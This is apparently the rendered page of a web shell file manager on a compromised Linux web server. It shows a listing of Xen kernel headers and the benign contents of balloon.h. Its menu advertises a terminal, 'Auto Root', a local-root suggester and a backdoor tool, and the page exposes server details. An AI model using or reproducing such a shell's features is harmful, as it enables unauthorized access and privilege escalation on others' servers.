Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-5.15.0-185 /
include /
xen /
Delete
Unzip
Name
Size
Permission
Date
Action
arm
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
interface
[ DIR ]
drwxr-xr-x
2026-06-27 06:50
acpi.h
2.52
KB
-rw-r--r--
2021-11-01 05:53
balloon.h
1.02
KB
-rw-r--r--
2021-11-01 05:53
events.h
4.72
KB
-rw-r--r--
2026-06-20 00:54
features.h
502
B
-rw-r--r--
2021-11-01 05:53
grant_table.h
11.33
KB
-rw-r--r--
2026-06-20 00:54
hvc-console.h
518
B
-rw-r--r--
2021-11-01 05:53
hvm.h
1.33
KB
-rw-r--r--
2021-11-01 05:53
mem-reservation.h
1.49
KB
-rw-r--r--
2021-11-01 05:53
page.h
1.29
KB
-rw-r--r--
2021-11-01 05:53
platform_pci.h
2.04
KB
-rw-r--r--
2021-11-01 05:53
swiotlb-xen.h
553
B
-rw-r--r--
2021-11-01 05:53
xen-front-pgdir-shbuf.h
2.31
KB
-rw-r--r--
2021-11-01 05:53
xen-ops.h
6.59
KB
-rw-r--r--
2021-11-01 05:53
xen.h
1.88
KB
-rw-r--r--
2026-06-20 00:54
xenbus.h
8.62
KB
-rw-r--r--
2021-11-01 05:53
xenbus_dev.h
1.8
KB
-rw-r--r--
2021-11-01 05:53
Save
Rename
/* SPDX-License-Identifier: GPL-2.0 */ /****************************************************************************** * Xen balloon functionality */ #ifndef _XEN_BALLOON_H #define _XEN_BALLOON_H #define RETRY_UNLIMITED 0 struct balloon_stats { /* We aim for 'current allocation' == 'target allocation'. */ unsigned long current_pages; unsigned long target_pages; unsigned long target_unpopulated; /* Number of pages in high- and low-memory balloons. */ unsigned long balloon_low; unsigned long balloon_high; unsigned long total_pages; unsigned long schedule_delay; unsigned long max_schedule_delay; unsigned long retry_count; unsigned long max_retry_count; }; extern struct balloon_stats balloon_stats; void balloon_set_new_target(unsigned long target); int alloc_xenballooned_pages(int nr_pages, struct page **pages); void free_xenballooned_pages(int nr_pages, struct page **pages); #ifdef CONFIG_XEN_BALLOON void xen_balloon_init(void); #else static inline void xen_balloon_init(void) { } #endif #endif /* _XEN_BALLOON_H */